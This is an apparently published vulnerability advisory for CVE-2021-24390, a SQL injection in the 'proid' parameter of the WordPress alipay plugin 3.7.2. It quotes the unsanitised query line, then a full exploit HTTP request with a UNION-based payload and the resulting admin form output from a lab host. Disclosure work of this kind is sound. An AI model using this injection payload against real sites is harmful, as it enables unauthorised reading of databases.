Plugin Details
Plugin Name: wp-plugin : alipay
Effected Version : 3.7.2 (and most probably lower version's if any)
Vulnerability : Injection
Minimum Level of Access Required : Administrator
CVE Number : CVE-2021-24390
Identified by : Syed Sheeraz Ali
Disclosure Timeline
-
May 9, 2021: Issue Identified and Disclosed to WPScan
- June 10, 2021 : CVE Assigned
- July 23, 2021 : Public Disclosure
Technical Details
Vulnerable File: /includes/tpl.edit_product.php#65
Vulnerable Code block and parameter:
Administrator level SQLi for parameter proid /includes/tpl.edit_product.php#65
65: "SELECT `meta_key`,`meta_value` FROM {$wpdb->wsaliproductsmeta} WHERE `wsaliproducts_id`={$_GET['proid']};"
PoC Screenshots
Exploit
GET /wp-admin/options-general.php?page=ws_alipay&action=edit&proid=-5818 UNION ALL SELECT 73,73,73,73,73,user(),73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73# HTTP/1.1
Host: 172.28.128.50
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-GPC: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: wordpress_232395f24f6cff47569f2739c21385d6=admin%7C1619997929%7CFjLHzIBKioEBny8ydzQjDZwzzgetHj4CE4LvUGwZ8BP%7C91ade9a8fb9ce5dd9f8590a3713b4002f95f743dbd80ca49f3e18fe1e19092b0; wordpress_test_cookie=WP%20Cookie%20check; tk_ai=woo%3Ajym5wvRdroAFcxeeEV79mZSv; wordpress_23bcb0de10e8e61a4aab16fc0e9c3005=admin%7C1619531389%7CfDLpVjSqvWcp84Tu2SXKjCfpbcKft3zcY9lfEhlLjE8%7Cc1f3ab6d2df213f5d04520ef98d98dbf47521a3340f91ea762a7ecc204bc4949; wordpress_logged_in_23bcb0de10e8e61a4aab16fc0e9c3005=admin%7C1619531389%7CfDLpVjSqvWcp84Tu2SXKjCfpbcKft3zcY9lfEhlLjE8%7C10c373d650899a426f0e107a8d04d192f21c6c3b838a87bc590bc99ac51bf144; PHPSESSID=6cadbb1f34b2576f2f7394894314e1a4; googtrans=/en/en; wordpress_logged_in_232395f24f6cff47569f2739c21385d6=admin%7C1619997929%7CFjLHzIBKioEBny8ydzQjDZwzzgetHj4CE4LvUGwZ8BP%7C271630feff089fbeb354c05f2163dcc39875be7fde3fa75d8c58c8f89ee443f4; wp-settings-1=mfold%3Do%26editor%3Dtinymce; wp-settings-time-1=1619825129
Connection: close
<form action="http://172.28.128.50/wp-admin/options-general.php?page=ws_alipay&action=edit&proid=-5818 UNION ALL SELECT 73,73,73,73,73,user(),73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73" method="post" id="ws_alipay_table_more_form" class="ws_alipay_table_form">
<div style="display:none"><label for="proid">商品编号</label><input name="proid" type="text" value="73" /></div><div><label for="name">商品名称</label><input name="name" type="text" value="73" /></div><div><label for="protype">商品类型</label><select name="protype" class="ws_alipay_select_protype" ><option value="CUSTOM">普通实物</option><option value="VIRTUAL">普通虚拟</option><option value="ADP">广告位</option><option value="LINK">友情链接</option></select></div><div><label for="price">商品价格</label><input name="price" type="text" value="73.00" /></div><div style="display:none"><label for="pricePerDay">每日单价</label><input name="pricePerDay" type="text" value="" class="ws_alipay_multiPrice" /></div><div style="display:none"><label for="pricePerWeek">每周单价</label><input name="pricePerWeek" type="text" value="" class="ws_alipay_multiPrice" /></div><div style="display:none"><label for="pricePerMonth">每月单价</label><input name="pricePerMonth" type="text" value="" class="ws_alipay_multiPrice" /></div><div style="display:none"><label for="pricePerQuarter">每季单价</label><input name="pricePerQuarter" type="text" value="" class="ws_alipay_multiPrice" /></div><div style="display:none"><label for="pricePerYear">每年单价</label><input name="pricePerYear" type="text" value="" class="ws_alipay_multiPrice" /></div><div><label for="description">商品描述</label><input name="description" type="text" value="73" /></div><div><label for="weight">商品净重(kg)</label><input name="weight" type="text" value="73.00" /></div><div><label for="snum">已售数量</label><input name="snum" type="text" value="73" readonly="readonly" /></div><div><label for="num">剩余数量</label><input name="num" type="text" value="bob@localhost" /></div><div><label for="images">商品图片地址</label><input name="images" type="text" value="73" /></div><div><label for="download">下载链接</label><input name="download" type="text" value="73" /></div><div><label for="zipcode">解压密码</label><input name="zipcode" type="text" value="" /></div><div><label for="tags">商品标签(,)</label><input name="tags" type="text" value="73" /></div><div><label for="spfre">买家承担运费</label><select name="spfre" class="ws_alipay_select_spfre" ><option value="0">否</option><option value="1">是</option></select></div><div><label for="freight">运费价格</label><input name="freight" type="text" value="73.00"
---
class="ws_alipay_select_spfre_rel" /></div><div><label for="location">商品所在地</label><input name="location" type="text" value="73" /></div><div><label for="atime">商品添加日期</label><input name="atime" type="text" value="73" readonly="readonly" /></div><div><label for="btime">商品上架时间</label><input name="btime" type="text" value="73" /></div><div><label for="etime">商品下架时间</label><inpu
t name="etime" type="text" value="73" /></div><div><label for="promote">开启促销</label><select name="promote" class="ws_alipay_select_promote" ><option value="0">关闭</option><option value="1">开启</option></select></div><div><label for="protime">开启每日促销</label><select name="protime" class="ws_alipay_select_protime ws_alipay_select_promote_rel" ><option value="0">关闭</option><option value="1">开启</option></select></div><div><label for="probdate">促销开始日期</label><input name="probdate" type="text" value="73" class="ws_alipay_select_promote_rel ws_alipay_select_promote_rel" /></div><div><label for="probtime">促销开始时间</label><input name="probtime" type="text" value="73" class="ws_alipay_select_protime_rel ws_alipay_select_promote_rel" /></div><div><label for="proedate">促销结束日期</label><input name="proedate" type="text" value="73" class="ws_alipay_select_promote_rel ws_alipay_select_promote_rel" /></div><div><label for="proetime">促销结束时间</label><input name="proetime" type="text" value="73" class="ws_alipay_select_protime_rel ws_alipay_select_promote_rel" /></div><div><label for="discountb">促销折扣</label><select name="discountb" class="ws_alipay_select_discountb ws_alipay_select_promote_rel" ><option value="0">关闭</option><option value="1">开启</option></select></div><div><label for="discount">折扣比率</label><input name="discount" type="text" value="73.00" class="ws_alipay_select_discountb_rel ws_alipay_select_promote_rel" /></div><div><label for="tplid">模版选择</label><input name="tplid" type="text" value="73" /></div><div><label for="autosend">启用自动货源列表</label><select name="autosend" class="ws_alipay_select_autosend" ><option value="0">关闭</option><option value="1">开启</option></select></div><div><label for="autosep">货源分隔符</label><input name="autosep" type="text" value="73" class="ws_alipay_select_autosend_rel" /></div><div style="float:none;clear:both;width:100%;">
<label for="autosrc" style="float:left;padding-left:2.5%;width:100%">虚拟物品货源 (如果货源文本是每行一个条目,请将'货源分隔符'留空。一旦设置了分隔符,下面的货源文件就应该用该分隔符分隔)</label>
<textarea name="autosrc" style="float:right;display:block;width:97.5%;min-width:97.5%;max-width:97.5%;min-height:70px;margin-left:2.5%" class="ws_alipay_select_autosend_rel">73</textarea>
</div><div><label for="buylink">商品快捷链接</label><input name="buylink" type="text" value="http://172.28.128.50/wp-content/plugins/alipay/includes/tpl.cart.php?proid=73" class="ws_alipay_prolink" title="双击打开" /></div><input type="hidden" id="_wpnonce" name="_wpnonce" value="9385918456" /><input type="hidden" name="_wp_http_referer" value="/wp-admin/options-general.php?page=ws_alipay&action=edit&proid=-5818 UNION ALL SELECT 73,73,73,73,73,user(),73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73#" />
<input type="submit" name="submit" class="button-primary" value="更新"/>
<div class="clear"></div>
</form>